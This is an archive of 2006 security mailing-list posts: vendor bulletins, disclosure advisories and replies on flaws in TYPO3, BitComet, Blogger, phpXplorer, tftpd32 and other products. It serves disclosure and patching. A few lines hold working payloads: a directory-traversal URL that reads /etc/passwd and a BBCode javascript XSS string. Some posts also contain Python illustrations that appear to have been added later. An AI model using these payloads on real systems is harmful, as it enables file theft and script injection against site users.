HITBSecConf2005 Videos Released

2006-01-19 Thread Praburaajan

Hi all,

After a long wait and a series of misadventures, we are pleased to
announce the availability of the HITBSecConf2005 Kuala Lumpur
videos.

You can grab them here: http://video.hitb.org/2005.html

The videos are distributed via Bit Torrent network and are broken
down into two separate packages.

HITBSecConf2006 will be taking place this year from September
16th - 19th at The Westin Kuala Lumpur. Stay tuned for the CfP
which will be announced sometime next month.

Cheers and enjoy the videos.

--Prabu
http://www.hackinthebox.org



IRM 015: File system path disclosure on TYPO3 Web Content Manager

2006-01-19 Thread Advisories
--
IRM Security Advisory No. 015

File system path disclosure on TYPO3 Web Content Manager

Vulnerability Type / Importance: Information Leakage / Medium

Problem discovered: January 13th 2006
Vendor contacted: January 13th 2006
Advisory published: January 19th 2006
--

Abstract:

TYPO3 is a free Open Source content management system for enterprise
purposes on the web and in intranets. It offers full flexibility and
extendability while featuring an accomplished set of ready-made interfaces,
functions and modules.

Description:

IRM has discovered an information leakage vulnerability in TYPO3 that
allows remote users to disclose the file system path of the application when
requesting certain files.

The following files were found to disclose the application path:

http://hostname/typo3/t3lib/thumbs.php
http://hostname/tslib/showpic.php
http://hostname/t3lib/stddb/tables.php

Technical details:

The issue is due to the application failing to properly determine its own
physical path and therefore trying to 'require()' a wrong class file.

 From init.php, line 71:
define('PATH_thisScript', str_replace('//', '/', str_replace('\\', '/',
    // CGI-style SAPIs: prefer (ORIG_)PATH_TRANSLATED; otherwise use (ORIG_)SCRIPT_FILENAME
    (php_sapi_name() == 'cgi' || php_sapi_name() == 'isapi' || php_sapi_name() == 'cgi-fcgi')
        && ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    ? ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    : ($_SERVER['ORIG_SCRIPT_FILENAME'] ? $_SERVER['ORIG_SCRIPT_FILENAME'] : $_SERVER['SCRIPT_FILENAME']))));

 From the PHP manual:
You can define a constant by using the define()-function. Once a constant
is defined, it can never be changed or undefined.

The vulnerable files listed above fail to include init.php and the
'PATH_thisScript' variable is locally calculated:

define('PATH_thisScript', str_replace('//', '/', str_replace('\\', '/',
    (php_sapi_name() == 'cgi' || php_sapi_name() == 'isapi' || php_sapi_name() == 'cgi-fcgi')
        && ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    ? ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    : ($_SERVER['ORIG_SCRIPT_FILENAME'] ? $_SERVER['ORIG_SCRIPT_FILENAME'] : $_SERVER['SCRIPT_FILENAME']))));

// In a POSIX ERE '.' also matches '/', so this strips the trailing '<dir>/<file>';
// the result is the site root only when the script sits one directory below it
define('PATH_site', ereg_replace('[^/]*.[^/]*$', '', PATH_thisScript));

define('PATH_t3lib', PATH_site . 't3lib/');
define('PATH_tslib', PATH_site . 'tslib/');

At this point, constants 'PATH_t3lib' and 'PATH_tslib' contain wrong values
and any 'require()' function using these constants will not work and will
disclose the file system path.
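To make the "wrong values" concrete, the following Python (an added illustration, not code from IRM or TYPO3) replays the PATH_site derivation above with the same regular expression for the files the advisory lists; the document root /var/www/ is a constructed example value.

```python
import re
from typing import Dict, Iterable

# The POSIX ERE from the advisory. '.' also matches '/', so the pattern strips
# the trailing '<dir>/<file>' of the script path; that yields the site root only
# when the script sits one directory below it, as typo3/init.php does.
PATH_SITE_PATTERN = re.compile(r"[^/]*.[^/]*$")

# Constructed document root for the demonstration; not from the advisory.
DOC_ROOT = "/var/www/"

# Relative paths of the scripts named in the advisory, plus init.php for contrast.
SCRIPTS = [
    "typo3/init.php",
    "typo3/t3lib/thumbs.php",
    # Two levels deep, so this step alone gives it the right root; the advisory
    # does not say which require() goes wrong for it.
    "tslib/showpic.php",
    "t3lib/stddb/tables.php",
]


def derive_paths(path_this_script: str) -> Dict[str, str]:
    """Replicate the local derivation of PATH_site, PATH_t3lib and PATH_tslib
    that each affected file performs instead of including init.php."""
    path_site = PATH_SITE_PATTERN.sub("", path_this_script, count=1)
    return {
        "PATH_site": path_site,
        "PATH_t3lib": path_site + "t3lib/",
        "PATH_tslib": path_site + "tslib/",
    }


def wrong_site_roots(doc_root: str, scripts: Iterable[str]) -> Dict[str, str]:
    """Map each script whose derived PATH_site differs from the real site root
    to the value it derived. A require() built on that value fails, and with
    display_errors on the PHP error text carries the absolute path."""
    mismatches = {}
    for rel in scripts:
        derived = derive_paths(doc_root + rel)["PATH_site"]
        if derived != doc_root:
            mismatches[rel] = derived
    return mismatches


if __name__ == "__main__":
    for rel, derived in wrong_site_roots(DOC_ROOT, SCRIPTS).items():
        print(f"{rel}: PATH_site={derived} (expected {DOC_ROOT})")
```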


Tested Versions:

Version 3.7.1 


Vendor & Patch Information:

Contact was initially made via the TYPO3 bug reporting system on January
13th 2006. 
On January 14th a patch for the issue was published on the site 
(http://bugs.typo3.org/view.php?id=2248)


Workarounds:

IRM are not aware of any workarounds for this issue.


Credits:

Research & Advisory: Rodrigo Marcos


Disclaimer:

All information in this advisory is provided on an 'as is'
basis in the hope that it will be useful. Information Risk Management
Plc is not responsible for any risks or occurrences caused
by the application of this information.

A copy of this advisory may be found at:

http://www.irmplc.com/advisories.htm

--

Information Risk Management Plc.
Kings Building,
Smith Square, London,
United Kingdom 
SW1P 3JJ
+44 (0)207 808 6420




Fortinet Advisory: BitComet URI Buffer Overflow Vulnerability

2006-01-19 Thread Fortinet Research
Fortinet Security Advisory: FSA-2006-07

BitComet URI Buffer Overflow Vulnerability

Advisory Date  : January 18, 2006
Reported Date  : November 29, 2005
Vendor : BitComet
Affected Products  : BitComet v0.60
Severity   : High
Reference  : http://www.bitcomet.com/doc/download.htm

Description:  Fortinet Security Research Team (FSRT) has
discovered a URI buffer overflow vulnerability in the BitComet P2P client
software. It indicates a possible exploit of a buffer overflow vulnerability
in BitComet. BitComet is one of the most popular P2P clients for file
sharing, which uses the BitTorrent protocol. There is a bug in BitComet: a
remote attacker could construct a special .torrent file and put it on any
BT publishing web site. When a user downloads the .torrent file and clicks on
the publisher's name, BitComet will crash. An attacker can run arbitrary
commands on the victim's host by means of a specially crafted .torrent file.

Impact : Execute arbitrary code

Solution   : BitComet has released an update for this
vulnerability, which is available for downloading from BitComet's web
site.

Fortinet Protection: FortiGate series of security systems have been
updated to detect exploits targeting this vulnerability.

Acknowledgment : Dejun Meng of Fortinet Security Research team found
this vulnerability.

Disclaimer : Although Fortinet has attempted to provide accurate
information in these materials, Fortinet assumes no legal responsibility
for the accuracy or completeness of the information. More specific
information is available on request from Fortinet. Please note that
Fortinet's product information does not constitute or contain any
guarantee, warranty or legally binding representation, unless expressly
identified as such in a duly signed writing.




[eVuln] WebspotBlogging Authentication Bypass Vulnerability

2006-01-19 Thread alex
New eVuln Advisory:
WebspotBlogging Authentication Bypass Vulnerability
http://evuln.com/vulns/41/summary.html

Summary

Software: WebspotBlogging
Software's Web Site: http://www.webspot.co.uk/
Versions: 3.0
Critical Level: Dangerous
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0041

-Description---
Vulnerable script:
login.php

Variable $_POST[username] isn't properly sanitized before being used in a SQL 
query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: gpc_magic_quotes - off

The administrator has the ability to import themes using PHP code insertion
from the Admin Control Panel.

System access is possible.

--Exploit--
Available at: http://evuln.com/vulns/41/exploit.html


--Solution-
No Patch available.

--Credit---
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Cisco Security Advisory: Cisco Call Manager Privilege Escalation

2006-01-19 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Call Manager Privilege Escalation

Advisory ID: cisco-sa-20060118-ccmpe

http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml

Revision 1.0


For Public Release 2006 January 18 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Cisco CallManager (CCM) is the software-based call-processing
component of the Cisco IP telephony solution which extends enterprise
telephony features and functions to packet telephony network devices
such as IP phones, media processing devices, voice-over-IP (VoIP)
gateways, and multimedia applications. Cisco CallManager versions
with Multi Level Administration (MLA) enabled may be vulnerable to
privilege escalations, which may result in read-only users gaining
administrative access.

Cisco has made free software available to address this vulnerability
for affected customers. There are workarounds available to mitigate
the effects of the vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml.

Affected Products
=

Vulnerable Products
+--

These Cisco CallManager versions with Multi Level Administration
(MLA) enabled are vulnerable:

  * Cisco CallManager 3.2 and earlier
  * Cisco CallManager 3.3, versions earlier than 3.3(5)SR1
  * Cisco CallManager 4.0, versions earlier than 4.0(2a)SR2c
  * Cisco CallManager 4.1, versions earlier than 4.1(3)SR2

No other Cisco products are currently known to be affected by these
vulnerabilities.

Complete this procedure to check if Multi Level Administration is
enabled:

 1. Access CCM Administration with this URL: http://CCMServer/ccmadmin, 
where CCMServer specifies the IP address or name of
the Cisco CallManager server.
 2. Choose User > Access Rights > Configure MLA Parameters. The MLA
Enterprise Parameter Configuration page displays.
 3. MLA is enabled if the Enable MultiLevelAdmin enterprise parameter
is set to True.

Details
===

An administrative user with read-only permission can use a crafted
URL on the CCMAdmin web page to escalate privileges to a full
administrative level. This vulnerability applies to users who are
authenticated to the read-only administrative level. Users with no
administrative access and users with full administrative permissions
continue to work as expected.

Administrative users with access privilege Read Only should not be
confused with the standard User Group named Read Only which is
created at installation. For further details on user groups and
assigning access privileges, please refer to this URL: 
http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803ed6ea.html#wp1022471.

  * CSCef75361, CSCsb12765, CSCsb88649, CSCsc26275: CCMAdmin Read Only
User Can Escalate Privileges

Impact
==

Successful exploitation of the vulnerability may result in privilege
escalation where read-only administrative users can gain full
administrative privileges and create, delete, or reset devices.

Software Versions and Fixes
===

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco CallManager software table (below) describes a
release train which will address all of the vulnerabilities mentioned
in this advisory. If a given release train is vulnerable, then the
earliest possible releases that contain the fixes (the First Fixed
Release) and the anticipated date of availability for each are
listed in the Engineering Special, Service Release, and
Maintenance Release columns. A device running a Cisco CallManager
release in the given train that is earlier than the release in a
specific column (less than the First Fixed Release listed in the
Engineering Special or Special Release column) is known to be
vulnerable to one or more issues. The Cisco CallManager should be
upgraded at least to the indicated release or a later version
(greater than or equal to the First Fixed Release label).


Re: Re: MSN Messenger Password Decrypter for WinXP/2003

2006-01-19 Thread null
Hi,
This is the author of the MSN Messenger Password Recovery tool. I searched
Google and found this post.
I would like to assure you that this program is not dangerous and does not 
perform any illegal actions. All it does is read the registry values and 
decrypt them. What's wrong with using UPX?
As far as the link at the bottom is concerned - we are in the process of making 
the Skype tool and will put a proper website in place once we are finished.
Also, regarding your message that this program is malicious:

http://www.softpedia.com/progClean/MSN-Messenger-Password-Recovery-Clean-32261.html

MSN Messenger Password Recovery 1.1.100.2006 - SOFTPEDIA 100% CLEAN AWARD
This software product was tested in the Softpedia labs on: 18 January 2006


CAID 33756 - DM Deployment Common Component Vulnerabilities

2006-01-19 Thread Williams, James K


Title: CAID 33756 - DM Deployment Common Component
Vulnerabilities

CA Vulnerability ID: 33756

Discovery Date: 2005-12-20

CA Advisory Date: 2006-01-17

Discovered By: Cengiz Aykanat (CA internal audit), and 
Karma[at]DesignFolks[dot]com[dot]au.


Impact: Remote attacker can cause a denial of service condition.


Summary: The following security vulnerability issues have been 
identified in the DM Primer part of the DM Deployment Common 
Component being distributed with some CA products:
1) A Denial of Service (DoS) vulnerability has been identified in 
the handling of unrecognized network messages, which may result 
in high CPU utilization and excessive growth of the DM Primer 
log file.
2) A Denial of Service (DoS) vulnerability has been identified 
with the way in which DM Primer handles receipt of large rogue 
network messages, which can result in DM Primer becoming 
unresponsive. 


Severity: Computer Associates has given this vulnerability a 
Medium risk rating.


Mitigating Factors: These vulnerabilities will only be present if 
you have utilized the DM Deployment mechanism (bundled with the 
affected products) to deploy those products within your 
enterprise environment.


Affected Technologies: Please note that the DM Primer component 
is not a product, but rather a common component that is included 
with multiple products.  Vulnerable versions of the DM Primer 
component are included in the CA products listed in the Affected 
Products section below.  DM Primer component versions v1.4.154 
and v1.4.155 are vulnerable to these issues.  These 
vulnerabilities are not present in DM Primer v11.0 or later.


Affected Products:
- BrightStor Mobile Backup r4.0
- BrightStor ARCserve Backup for Laptops & Desktops r11.0, r11.1, 
r11.1 SP1
- Unicenter Remote Control 6.0, 6.0 SP1
- CA Desktop Protection Suite r2
- CA Server Protection Suite r2
- CA Business Protection Suite r2
- CA Business Protection Suite for Microsoft Small Business 
Server Standard Edition r2
- CA Business Protection Suite for Microsoft Small Business 
Server Premium Edition r2
- CA Business Protection Suite for Midsize Business for Windows 
r2


Affected platforms:
Windows


Platforms NOT affected:
This version of DM Primer is not supported on any other 
platforms.


Status and Recommendation: 
Since this version of DM Primer is only utilized for the initial 
installation of the products, the above vulnerabilities can be 
addressed by simply removing the DM Primer Service after 
deployment.  To remove the DM Primer component follow the 
instructions below:

dmprimer remove -f:

will force the removal of a local DM Primer service,

dmsweep -a1:remotecomp -dp:force

will force the removal of the DM Primer service from a remote 
computer called remotecomp.

The dmsweep command will be available on the DM Deployment 
machine (usually the host for the product manager with which it 
was bundled).  It can take a machine name, an ip address, or a 
range of ip addresses.  Some examples are:

dmsweep -a1:192.168.0.*  -dp:force

will forcibly remove DM Primer from all machines on the 
192.168.0.* subnet

dmsweep -a1:192.168.0.1 -a2:192.168.0.100 -dp:force

will forcibly remove DM Primer from all machines in the range 
192.168.0.1-192.168.0.100



Please refer to the FAQ for answers to commonly asked 
questions.
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faqs.asp


References: 
(note that URLs may wrap)
DM Deployment Common Component Security Notice
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity_notice.asp

Frequently Asked Questions (FAQ) related to this security update
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faqs.asp

CA Security Advisor site advisory
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33756

CVE Reference: Pending
http://cve.mitre.org

OSVDB Reference: Pending
http://osvdb.org

Error Handling in DM Primer
http://www.designfolks.com.au/karma/DMPrimer/


Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to [EMAIL PROTECTED], or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to [EMAIL PROTECTED], or utilize our Submit a 
Vulnerability form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Dir. Vuln Research 
CA Vulnerability Research Team


CA, One Computer Associates Plaza. Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://ca.com/calegal.htm
Privacy Policy http://www.ca.com/caprivacy.htm
Copyright 2006 CA.  All rights reserved.


Google's Blogger.com classic HTTP response splitting vulnerability

2006-01-19 Thread Meder Kydyraliev

Blogger.com classic HTTP response splitting vulnerability
~

0. Original Advisory
~~~
http://o0o.nu/~meder/o0o_Blogger_HTTP_response_splitting.txt


I. Background
~

Blogger.com is Google's blogging service.


II. Description
~~~

Blogger's personal page redirection mechanism contains a classic HTTP
response splitting vulnerability in the Location HTTP header. The
problem occurs due to the use of unsanitized user-supplied data in the
Location HTTP header, which enables an attacker to inject CRLF (%0d%0a)
characters, thus splitting the server's response and taking full control
over the contents of the second HTTP response. Exploitation of the
vulnerability can lead to cross-site scripting (XSS), cache poisoning and
phishing attacks.

The following URL was taking the contents of the query string and using it
in the Location HTTP header without proper sanitization:

http://www.blogger.com/r?[URL here]
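The following Python is an added illustration of the redirect pattern described above and of its hardened counterpart; it is not Blogger's code, and the allowlisted host and the sample query string are constructed for the example.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed allowlist of hosts a redirect may point to; not from the advisory.
ALLOWED_HOSTS = {"www.blogger.com"}

# Constructed request: a query string carrying %0d%0a, the CRLF sequence the
# advisory names, followed by a second status line.
SPLIT_QUERY = "http://www.blogger.com/%0d%0a%0d%0aHTTP/1.1%20200%20OK"


def naive_redirect(query: str) -> bytes:
    """The pattern the advisory describes: the decoded query string is written
    straight into Location, so a CRLF inside it ends the header block and
    whatever follows is parsed as a second response."""
    target = unquote(query)
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode("latin-1", "replace")


def safe_location(query: str) -> Optional[str]:
    """Return a Location value for `query`, or None if it must be rejected.
    The checks run on the percent-decoded form, because that is what the
    server would write into the header."""
    target = unquote(query)
    # CR, LF and every other control or non-ASCII character can never appear
    # in a header value; rejecting them up front closes the splitting vector.
    if any(not 0x20 <= ord(ch) <= 0x7E for ch in target):
        return None
    try:
        parts = urlsplit(target)
    except ValueError:
        return None
    # Restricting scheme and host also blocks open redirects and javascript: URLs.
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        return None
    return target


def safe_redirect(query: str) -> bytes:
    """Hardened counterpart of naive_redirect: refuse rather than emit."""
    target = safe_location(query)
    if target is None:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode("ascii")


def response_count(raw: bytes) -> int:
    """Count status lines the way a proxy or cache splitting the stream would;
    more than one for a single request means the response was split."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))
```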


III. Vendor status 
~~

Vulnerability has been fixed on 13/01/2006


IV. Disclosure timeline
~~~

02/01/2006 - Issue discovered. Vendor notified.
02/01/2006 - Initial vendor response.
12/01/2006 - Vendor inquired on status.
13/01/2006 - Vendor response and confirmation that bug fixed.


V. References
~

1. http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf


-- 
http://o0o.nu/~meder


Re: IRM 015: File system path disclosure on TYPO3 Web Content Manager

2006-01-19 Thread Michael Shigorin
On Thu, Jan 19, 2006 at 10:30:36AM -, Advisories wrote:
> File system path disclosure on TYPO3 Web Content Manager
> Vulnerability Type / Importance: Information Leakage / Medium

Hm, since when is path disclosure of medium importance?

> The following files were found to disclose the application path:
> http://hostname/typo3/t3lib/thumbs.php
> http://hostname/tslib/showpic.php
> http://hostname/t3lib/stddb/tables.php
> Tested Versions:
> Version 3.7.1

The first one is verified as applicable to 3.8.1 too (easily
avoidable by adding an IP- or user-based access restriction
to /typo3, since that's the administrative backend anyway),
and the rest don't disclose anything on a properly configured
(at least display_errors-wise) webserver, which is a documented,
recommended (and often reiterated everywhere) PHP setup.

> Workarounds:
> IRM are not aware of any workarounds for this issue.

Ouch. :)

-- 
  WBR, Michael Shigorin [EMAIL PROTECTED]
  -- Linux.Kiev http://www.linux.kiev.ua/




[security bulletin] SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of Service (DoS)

2006-01-19 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00592668

Version: 1

HPSBUX02092 SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of
Service (DoS)

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-01-17
Last Updated: 2006-01-18

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company,
HP Software Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP-UX
running ftpd.  The vulnerability could be exploited by a remote
unauthorized user to cause ftpd to become unresponsive, leading to
a Denial of Service (DoS).

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running ftpd

BACKGROUND

To determine if an HP-UX system has an affected version,
search the output of swlist -a revision -l fileset
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.23
=
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33414 or subsequent

HP-UX B.11.11
=
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33412 or subsequent

HP-UX B.11.11
=
WUFTP-26.INETSVCS-FTP
action: install revision B.11.11.01.006 or subsequent.

HP-UX B.11.04
=
InternetSrvcs.INETSVCS-RUN
action: install PHNE_34077 or subsequent

HP-UX B.11.00
=
InternetSrvcs.INETSVCS-RUN
action: install PHNE_33406 or subsequent

HP-UX B.11.00
=
WUFTP-26.INETSVCS-FTP
action: install revision B.11.00.01.005 or subsequent.


END AFFECTED VERSIONS
RESOLUTION

HP has made the following patches available to resolve the issue
for the InternetSrvcs product.
The patches can be downloaded from http://itrc.hp.com

B.11.23 - PHNE_33414 or subsequent
B.11.11 - PHNE_33412 or subsequent
B.11.04 - PHNE_34077 or subsequent
B.11.00 - PHNE_33406 or subsequent

HP has made the following software updates available to resolve
the issue for the WUFTP-26 product.  The software updates can be
downloaded from http://www.hp.com/go/softwaredepot

B.11.11 - revision B.11.11.01.006 or subsequent.
B.11.00 - revision B.11.00.01.005 or subsequent.

MANUAL ACTIONS: Yes - Update
B.11.23, B.11.04 - No manual actions.
B.11.11, B.11.00 - InternetSrvcs - No manual actions.
B.11.11, B.11.00 - WUFTP-26 - Install software updates.


PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00
analyzes all HP-issued Security Bulletins to provide a subset of
recommended actions that potentially affect a specific HP-UX
system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA


HISTORY
Version:1 (rev.1) - 18 January 2006 Initial release



Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin 

Phpclanwebsite BBCode IMG Tag XSS Vulnerability

2006-01-19 Thread [at]
##Night_Warrior - Kurdish Hacker
##night_warrior771[at]hotmail.com
##Phpclanwebsite BBCode IMG Tag XSS Vulnerability
##Contact :night_warrior771[at]hotmail.com
##homepage : www.phpclanwebsite.com

Vulnerable:

[img]javascript:alert('XSS')[/img]

Contact :night_warrior771[at]hotmail.com
Night_Warrior


Re: Directory traversal in phpXplorer

2006-01-19 Thread Stan Bubrouski
Hey,

I just wanted to point out a couple of things I neglected to mention
in my first reply to this advisory:
1) Even if something isn't a critical problem, a vendor should still
respond to the issue, if for no other reason than to straighten out
the situation with the user who had enough insight to spot it and
assume it's a problem.
2) Only reporting a bug between Dec 20 - Jan 4 is bad practice, I
think.  The advisory noted those two dates as when the vendor was sent
an advisory.  As most people know this period of time is considered
Christmas and New Year's vacation in the USA and other places.  Beyond
that, the phpXplorer project is an open source project and may not have
dedicated support.

In short, a little more leeway should be given during the holidays,
and vendors should always respond to issues like this so no one gets
hung out to dry.

Best Regards,
Stan Bubrouski


On 1/16/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
> Seeing as phpXplorer allows the upload and editing of live PHP files
> anyways it seems to me this exploit is completely useless.  You can
> use the script as intended to cat the password file if you want.
> Right?
>
> -sb
>
>
> On 1/16/06, Oriol Torrent [EMAIL PROTECTED] wrote:
> > ==
> > Title: Directory traversal in phpXplorer
> >
> > Application: phpXplorer
> > Vendor: http://www.phpxplorer.org
> > Vulnerable Versions: 0.9.33
> > Bug: directory traversal
> > Date: 16-January-2006
> > Author: Oriol Torrent Santiago <oriol.torrent.AT.gmail.com>
> >
> > References:
> > http://www.arrelnet.com/advisories/adv20060116.html
> >
> > ==
> >
> > 1) Background
> > ---
> > phpXplorer is an open source file management system written in PHP.
> > It enables you to work on a remote file system through a web browser.
> >
> >
> > 2) Problem description
> >
> > An attacker can read arbitrary files outside the web root by sending
> > specially formed requests
> >
> > Ex:
> >
> > http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00ref=1
> >
> >
> > 3) Solution:
> > --
> > No Patch available.
> >
> >
> > 4) Timeline
> > -
> > 17/12/2005 Bug discovered
> > 20/12/2005 Vendor receives detailed advisory. No response
> > 04/01/2006 Second notification. No response
> > 16/01/2006 Public Disclosure
 



Critical security advisory #006 tftpd32 Format string

2006-01-19 Thread admin
Critical security advisory #006
Tftpd32 2.81 Format String + DoS PoC
Critical Security - 22:03 2006.01.19
Critical Security research: http://www.critical.lt
Product site: http://tftpd32.jounin.net/
Credits : Critical Security Team (www.critical.lt)
Original Advisory: http://www.critical.lt/?vulnerabilities/200
Due to incorrect use of format strings, there is a possibility of remote code
execution. You can trigger this vulnerability by sending a SEND or GET request
with a specially formatted string. Vulnerable code:

LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX ; /Arglist
PUSH EDX ; |Format
PUSH EAX ; |s = 00E6F4E8
CALL DWORD PTR DS:[USER32.wvsprintfA] ; \wvsprintfA

Proof of concept exploit:
http://www.critical.lt/research/tftpd32_281_dos.txt


MDKSA-2006:017 - Updated mod_auth_ldap packages fix vulnerability

2006-01-19 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:017
 http://www.mandriva.com/security/
 ___
 
 Package : mod_auth_ldap
 Date: January 19, 2006
 Affected: Corporate 2.1
 ___
 
 Problem Description:
 
 A format string flaw was discovered in the way that auth_ldap logs
 information which may allow a remote attacker to execute arbitrary code
 as the apache user if auth_ldap is used for authentication.
 
 This update provides version 1.6.1 of auth_ldap which corrects the
 problem.  Only Corporate Server 2.1 shipped with a supported auth_ldap
 package.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150
 ___
 
 Updated Packages:
 
 Corporate Server 2.1:
 a579c887e48daaa8281ecdc4e1381fa0  
corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.i586.rpm
 3af337e3989aed18d9c6e634ecb3e47b  
corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm

 Corporate Server 2.1/X86_64:
 b3c27d91b6fa68e557507318c8e18f0c  
x86_64/corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.x86_64.rpm
 3af337e3989aed18d9c6e634ecb3e47b  
x86_64/corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com


FreeBSD Security Advisory FreeBSD-SA-06:05.80211

2006-01-19 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-06:05.80211  Security Advisory
  The FreeBSD Project

Topic:  IEEE 802.11 buffer overflow

Category:   core
Module: net80211
Announced:  2006-01-18
Credits:Karl Janmar
Affects:FreeBSD 6.0
Corrected:  2006-01-18 09:03:15 UTC (RELENG_6, 6.0-STABLE)
2006-01-18 09:03:36 UTC (RELENG_6_0, 6.0-RELEASE-p3)
CVE Name:   CVE-2006-0226

For general information regarding FreeBSD Security Advisories,
